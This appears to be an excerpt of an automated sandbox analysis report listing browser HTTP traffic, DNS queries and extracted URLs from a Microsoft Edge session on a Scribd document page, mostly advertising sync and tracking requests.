Source: global trafficHTTP traffic detected: GET /match/?int_id=2&uid=M7A5IT3R-G-GNOQ&gdpr=0 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /ht/htw-pixel.gif?0 HTTP/1.1Host: cdn.indexww.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ssum-sec.casalemedia.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?ssp=onetag&gdpr=0&gdpr_consent=&user_id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4 HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/?int_id=106&google_error=3&gdpr=0&gdpr_consent= HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /match/?int_id=19&google_error=3&gdpr=0&gdpr_consent= HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /pixel?&redir=https%3A%2F%2Fsync.adkernel.com%2Fuser-sync%3Fzone%3D176971%26dsp%3D763610%26t%3Dimage%26uid%3D%24UID HTTP/1.1Host: ap.lijit.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/?int_id=149&gdpr=0&gdpr_consent=&uid=part_V22NFapzdQQi&ev=1&us_privacy=&pid=562985 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /pixel?&redir=https%3A%2F%2Fsync.adkernel.com%2Fuser-sync%3Fzone%3D176971%26dsp%3D763610%26t%3Dimage%26uid%3D%24UID&sovrn_retry=true HTTP/1.1Host: ap.lijit.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /user-sync?zone=176971&dsp=763610&t=image&uid= HTTP/1.1Host: sync.adkernel.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/bounce/current?DotomiTest=29ded5403b8504a3&is_secure=true&version=1&networkId=72582&rurl=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D90%26gdpr%3D0%26gdpr_consent%3D%26uid%3D HTTP/1.1Host: prebid-match.dotomi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=bidswitch&ttd_tpi=1&ttd_puid=onetag&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=bidswitch&ttd_tpi=1&ttd_puid=onetag&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: 000003.log1.9.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log1.9.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log1.9.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: Reporting and NEL.13.drString found in binary or memory: coep_reporthttps://www.facebook.com/browser_reporting/coep/?minimize=0 equals www.facebook.com (Facebook)
Source: Reporting and NEL.13.drString found in binary or memory: coep_reporthttps://www.facebook.com/browser_reporting/coep/?minimize=0["GAAAABIAAABodHRwczovL3NjcmliZC5jb20AAA==",false] equals www.facebook.com (Facebook)
Source: Reporting and NEL.13.drString found in binary or memory: coop_reporthttps://www.facebook.com/browser_reporting/coop/?minimize=0 equals www.facebook.com (Facebook)
Source: Reporting and NEL.13.drString found in binary or memory: coop_reporthttps://www.facebook.com/browser_reporting/coop/?minimize=0["GAAAABIAAABodHRwczovL3NjcmliZC5jb20AAA==",false] equals www.facebook.com (Facebook)
Source: Reporting and NEL.13.drString found in binary or memory: permissions_policyhttps://www.facebook.com/ajax/browser_error_reports/ equals www.facebook.com (Facebook)
Source: Reporting and NEL.13.drString found in binary or memory: permissions_policyhttps://www.facebook.com/ajax/browser_error_reports/["GAAAABIAAABodHRwczovL3NjcmliZC5jb20AAA==",false] equals www.facebook.com (Facebook)
Source: load_statistics.db.9.dr, load_statistics.db-wal.9.drString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: load_statistics.db.9.drString found in binary or memory: www.scribd.comanalytics.twitter.coml equals www.twitter.com (Twitter)
Source: load_statistics.db.9.drString found in binary or memory: www.scribd.comconnect.facebook.net equals www.facebook.com (Facebook)
Source: load_statistics.db.9.drString found in binary or memory: www.scribd.comconnect.facebook.netA equals www.facebook.com (Facebook)
Source: load_statistics.db.9.drString found in binary or memory: www.scribd.comsp.analytics.yahoo.com equals www.yahoo.com (Yahoo)
Source: load_statistics.db.9.dr, load_statistics.db-wal.9.drString found in binary or memory: www.scribd.comups.analytics.yahoo.com equals www.yahoo.com (Yahoo)
Source: load_statistics.db.9.drString found in binary or memory: www.scribd.comwww.facebook.com equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: www.scribd.com
Source: global trafficDNS traffic detected: DNS query: s-f.scribdassets.com
Source: global trafficDNS traffic detected: DNS query: html.scribdassets.com
Source: global trafficDNS traffic detected: DNS query: cmp.osano.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: js.stripe.com
Source: global trafficDNS traffic detected: DNS query: a.pub.network
Source: global trafficDNS traffic detected: DNS query: b.pub.network
Source: global trafficDNS traffic detected: DNS query: c.pub.network
Source: global trafficDNS traffic detected: DNS query: confiant-integrations.global.ssl.fastly.net
Source: global trafficDNS traffic detected: DNS query: api.btloader.com
Source: global trafficDNS traffic detected: DNS query: btloader.com
Source: global trafficDNS traffic detected: DNS query: cmp.quantcast.com
Source: global trafficDNS traffic detected: DNS query: pixel.quantserve.com
Source: global trafficDNS traffic detected: DNS query: rules.quantcount.com
Source: global trafficDNS traffic detected: DNS query: secure.quantserve.com
Source: global trafficDNS traffic detected: DNS query: s.amazon-adsystem.com
Source: global trafficDNS traffic detected: DNS query: c.amazon-adsystem.com
Source: global trafficDNS traffic detected: DNS query: d.pub.network
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
Source: global trafficDNS traffic detected: DNS query: static.ads-twitter.com
Source: global trafficDNS traffic detected: DNS query: www.redditstatic.com
Source: global trafficDNS traffic detected: DNS query: s.yimg.com
Source: global trafficDNS traffic detected: DNS query: b-code.liadm.com
Source: global trafficDNS traffic detected: DNS query: cdn.pdst.fm
Source: global trafficDNS traffic detected: DNS query: utt.impactcdn.com
Source: global trafficDNS traffic detected: DNS query: analytics.tiktok.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: survey.survicate.com
Source: global trafficDNS traffic detected: DNS query: xspacet.wiki
Source: unknownHTTP traffic detected: POST /ccm/collect?en=page_view&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&scrsrc=www.googletagmanager.com&frm=0&rnd=1864411124.1739863009&dt=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&auid=940495529.1739863009&navt=n&npa=0&gtm=45He52d0v78386455za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~102067808~102482432~102539968~102558064~102587591~102605417~102640600&tft=1739863008867&tfd=5817&apve=1&apvf=sb HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: svchost.exe, 0000000C.00000002.2582769541.000001AC1060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Reporting and NEL.13.drString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=F%2Fs5ude33agmsBFj8quIMTFZKY9HsQUjlGkjKAwUIbDN%2Fn3oaqP1s%2
Source: Reporting and NEL.13.drString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=GoIedvClS4%2B0HO9PCGCWat3Vdlpr9QXYyC7D8JlO0DvaV7vHdTwCxrAm5
Source: Reporting and NEL.13.drString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=UwkNU4UzuulrSqW7u%2Frzp3o12jAG59smD2Zh3TC1npuOLyf6aHIM73F3z
Source: Reporting and NEL.13.drString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=cyREfEkWsH4qP63UwkdvYyE1Fr7xYBU6aBCOHI941ulB6ffwUntuLqFBgg4
Source: Reporting and NEL.13.drString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=gmsdyqgG9FxfLc51J9DFU%2Ba1brWX11ihr3V0EgYswjQO71d8h7lDgajbA
Source: Reporting and NEL.13.drString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=o%2B9BAeigPb%2BBOMAhbwblbcUCjpULIp%2BhQWD7zIvzH5Bh2A4H9cE%2
Source: Reporting and NEL.13.drString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=qa3Fe7Wike1G4g986fJUuFCGO4FZPuE6Bhf3A8wAavgRYOBTMzCFUoYvxEO
Source: Reporting and NEL.13.drString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=wjk7g1pRDfqCmGKXIPILfxQRPJRZsWaVSlkdJwLr%2B2QyrJyWbWfKe0qvW
Source: 000004.log.9.drString found in binary or memory: https://ads.pubmatic.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://ads.pubmatic.com/AdServer/js/user_sync.html?kdntuid=1&p=156696
Source: Session_13384336605253024.9.drString found in binary or memory: https://ads.pubmatic.com/AdServer/js/user_sync.html?p=159196&userIdMacro=PM_UID&gdpr=0&gdpr_consent=
Source: f4170ab3-9d23-422d-994d-f965ad944569.tmp.13.drString found in binary or memory: https://assets.msn.com
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://bard.google.com/
Source: Reporting and NEL.13.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 000004.log.9.drString found in binary or memory: https://cdn.btmessage.com/
Source: Session_13384336605253024.9.drString found in binary or memory: https://cdn.btmessage.com/assets/bt-rlink-storage-OAPAZjOc.html
Source: offscreendocument_main.js.9.dr, service_worker_bin_prod.js.9.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: Web Data.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Web Data.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: manifest.json0.9.drString found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json0.9.drString found in binary or memory: https://chromewebstore.google.com/
Source: f4170ab3-9d23-422d-994d-f965ad944569.tmp.13.drString found in binary or memory: https://clients2.google.com
Source: manifest.json.9.drString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: f4170ab3-9d23-422d-994d-f965ad944569.tmp.13.drString found in binary or memory: https://clients2.googleusercontent.com
Source: Session_13384336605253024.9.drString found in binary or memory: https://cs-server-s2s.yellowblue.io
Source: 000004.log.9.dr, Session_13384336605253024.9.drString found in binary or memory: https://cs-server-s2s.yellowblue.io/
Source: Session_13384336605253024.9.drString found in binary or memory: https://cs-server-s2s.yellowblue.io/cs?fwrd=1&aid=11607&uid=
Source: Session_13384336605253024.9.drString found in binary or memory: https://cs-server-s2s.yellowblue.io/sync-iframe?gdpr=0&gdpr_consent=&redirect=https%3A%2F%2Flive.pri
Source: Reporting and NEL.13.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media
Source: Reporting and NEL.13.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/adspam-signals-scs
Source: 2cc80dabc69f58b6_0.9.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/analytics-container-tag-serving
Source: Reporting and NEL.13.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/apps-themes
Source: Reporting and NEL.13.drString found in binary or memory: https://csp.withgoogle.com/csp/report-to/botguard-scs
Source: Reporting and NEL.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: manifest.json.9.drString found in binary or memory: https://docs.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json.9.drString found in binary or memory: https://drive.google.com/
Source: Web Data.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: f4170ab3-9d23-422d-994d-f965ad944569.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.log1.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log1.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log1.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log2.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: e5b83099-a32d-40b3-a9bb-e0f510b63935.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
